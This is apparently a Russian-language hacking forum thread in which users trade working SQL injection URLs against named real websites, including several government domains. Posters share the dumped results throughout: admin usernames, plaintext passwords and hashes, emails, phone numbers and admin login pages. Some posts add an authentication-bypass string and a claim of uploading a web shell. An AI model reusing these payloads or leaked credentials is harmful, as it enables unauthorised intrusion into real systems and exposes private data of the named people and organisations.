Code: http://www.sonybmgmusic.co.uk/artists/annie_lennox/-1/order+by+2/* нашел сайт очень интересный)) у самого опыта мало, может кому тоже интересно будет
dit.gov.bt - Pr5 Code: http://www.dit.gov.bt/newsdetail.php?newsId=-44+union+select+11,22,concat(0x2020202020202020202020,user,0x3a,password),44+from+mysql.user--
Code: [COLOR=Plum]http://vehaauto.ru/catalog.php?id_article=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11/*&id_page=1 [/COLOR] 4.0.27-max-log Code: [COLOR=Plum]http://www.cccp.de/humor/showitem.php?id=4+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5/*[/COLOR] 4.0.15:web2@localhost:usr_web2_1 Code: [COLOR=Plum]http://www.generalsemantics.org/inner.php?page=news&id=999999+union+select+1,2,version(),4/*[/COLOR] 5.0.22 Code: [COLOR=Plum]http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,table_name+from+information_schema.tables/*[/COLOR] CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS tbl_adminusers tbl_featured_products tbl_mainpages tbl_masterpages tbl_news tbl_quotes tbl_subpages Code: [COLOR=Plum]http://www.generalsemantics.org/inner.php?page=news&id=-9+union+select+1,2,3,concat_ws(0x3a,UserName,LoginName,PassWord,email,phoneNo)+from+tbl_adminusers/*[/COLOR] Lance Strate:lstrate:heroes:[email protected]:201-921-4745 Marty Levinson:Marty:Fairytales:[email protected]:718-793-6621 nmtucson:nmtucson:justme:[email protected]:520-225-0476 Jennifer Clarke:jennifer:56375637:[email protected]:817-922-9950 Login Page http://www.generalsemantics.org/admin/login.php Code: [COLOR=Plum]http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23[/COLOR] 5.0.51a:admin@localhost Code: [COLOR=Plum]http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+limit+19,1[/COLOR] table_name=aut Code: [COLOR=Plum]http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name=0x617574+limit+1,1[/COLOR] columns_name=log,pass Code: [COLOR=Plum]http://www.schtormovik.ru/podr.php?id=9999999999+union+select+1,2,concat_ws(0x3a,log,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+aut+limit+0,1[/COLOR] lisa:lisa dima:dima
база юзеров: username Code: http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,username,null,null,null,null,null,null,null,null,null,null+from+users+where+1=1/* password Code: http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,password,null,null,null,null,null,null,null,null,null,null+from+users+where+1=1/* мыла Code: http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,email,null,null,null,null,null,null,null,null,null,null+from+users+where+1=1/* таблицы Code: http://www.venskydom.ru/index.php?id=-1+union+select+null,null,null,column_name,null,null,null,null,null,null,null,null,null,null+from+information_schema.columns/* подскажите как в данном слуаче найти вдминку? также не получилось узнать version() и database() --------------- сорри тупанул version() - 5.0.32-Debian_7etch5-log database() - borodinmokaru админку все еще не нашел
worldrowing.com - Pr7 Code: http://www.worldrowing.com/display/modules/media/media_detail.php?mediacenterid=-8+union+select+1,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+mysql.user+limit+0,1--&imgnum=13&mdatype=1&searchKwd=&searchFrom=&searchTo=&cat=&subcat=209&subcat2=&page=0
version() - 4.1.20-LOG user() - VAULT@LOCALHOST database() - VAULT version() - 4.1.20-log user() - sportsouthuk@localhost database() - sportsouthuk version() - 4.1.22-standard user() - roguegov_publicr@localhost database() - roguegov_rgov
emspost.ru VERSION() 4.1.22-log DATABASE() emspost_1 USER() emspost_1@localhost Версия 4, такчто всё подобрано руками Сразу под парсер, разбивать по ::: Code: http://emspost.ru/news/archive/?id=-1+UNION+SELECT+1,2,3,4,concat(0x3a3a3a,concat_ws(0x3a3a3a,id,name,company,email,city,address,phone,login,pwd),0x3a3a3a),6,7,8,9+FROM+ems_clients+LIMIT+0,1/*
http://www.bbw.ro админка тут http://www.bbw.ro/admin/login.php version()= 5.0.45 user() = draft@localhost database() = bbw
http://emspost.ru/adm/ админка, но пассы хз где http://emspost.ru/news/archive/?id=-1+UNION+SELECT+1,2,3,4,concat(0x3a3a3a,concat_ws(0x3a3a3a,id,login,pwd),0x3a3a3a),6,7,8,9+FROM+ems_users+LIMIT+1,1/* эти не подходят
Business-academy.ru 5 ветка и таблы.. business-academy.ru/auth.form.php business-academy.ru/admin - 403 еще какието юзверы ) и форум... business-academy.ru/forum - IPB 2.2.2 - хотел шелл залить.. но пасс так не разшифровал: lenar:ee0801a9fb2b272b10830d0ffcf8c589 red_bar0n:84c1b6bd2d4b190b1583e11bf4ccd929 s2sage:f7ea695c3b11000daedb0db1f7dd5619 напоследок.. еще юзеры... Lor-homeopat.ru - PR 4 Launion.gov.ph - PR 3 пытался чтот сделать... но ( Bbw.ro login: admin' or 1=1/* pass: любой
Ну что ж... Начну и я пожалуй: qpogorod.ru Code: http://www.qpogorod.ru/raskazread.php?idArticle=-32+union+select+concat_ws(version(),0x3a,user()),2,3-- 4.0.27 [email protected] Сервер: Apache/1.3.33 (Unix) mod_fastcgi/2.4.0 FrontPage/5.0.2.2623 PHP/4.3.10 mod_gzip/1.3.19.1a mod_ssl/2.8.22 OpenSSL/0.9.7b rus/PL30.20 P.S: админку не нашел, так что дальше не раскручивал.
version() - 4.1.20 user() - latinore_content@localhost database() - latinore_content version() - 4.1.21-standard user() - root@localhost database() - greenshift version() - 4.1.22-standard user() - boxnews_a2k@localhost database() - boxnews_a2k
http://www.krasota.ru 4.1.16-standard-log ::: [email protected] ::: krasota_v3 таблички подобрать не смог... админка тут http://www.krasota.ru/admin/
mind.textdriven.com Database : bpasanek_metabase. Database Version: 4.1.22-log User: bpasanek@localhost
Eutrainingsite.com - PR 6 5 ветка.. таблы. /admin - 403 /forum.php редакторы.. Milledcarbon.com - PR 4 4 ветка, подобрал талицу news ) Bustur.ru - PR 3 5 ветка и таблы.. Fellini.net.ua - PR 3 4 ветка, рут.
http://www.rokf.ru/autosale/?s=autos&id=-1+union+select+1,2,3,4,5,6,concat(username,0x3a3a,password,0x3a3a,admin),8,9,10,11,12,13,14,15,16+from+phorum_users+limit+0,50/* Login: admin pass: adminus Дешевый админ =) Есть еще табличка dealers быть может в ней где-то зарыт ключик к http://www.rokf.ru/admin Но уж очень геморно рыть этот шлак )
Eggs.net.ua - PR 4 Веселі Яйця 5 ветка и таблы.. eggs_admin;eggs210705 еще пассы.. мыльники.. и самое вкусное..) file_priv y залили шелл..) Pangkalpinang.go.id - PR 3 5 ветка и таблы-мазахистов.) /admin Mypspwebsite.com рут.. и /admin/members/default.php Cyberblue.it-lighthouse.com юзеры ) It-lighthouse.com непонятные пароли сайт под эту базу не был обнаружен.) Crestron-home.ru Animedvd.ru
PHP: http://una.ge/eng/artdetail.php?group=articles&id=102+union+select+1,2,version(),4,5,6,7,8,9 PHP: http://una.ge/eng/artdetail.php?group=articles&id=102+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables+limit+16,10 Дальше сам крути
www.cyberthing.net http://www.cyberthing.net/video-play.php?id=9999999999+union+select+1,2,3,4,5,6,7/* 5.0.22-Debian_0ubuntu6.06.10-log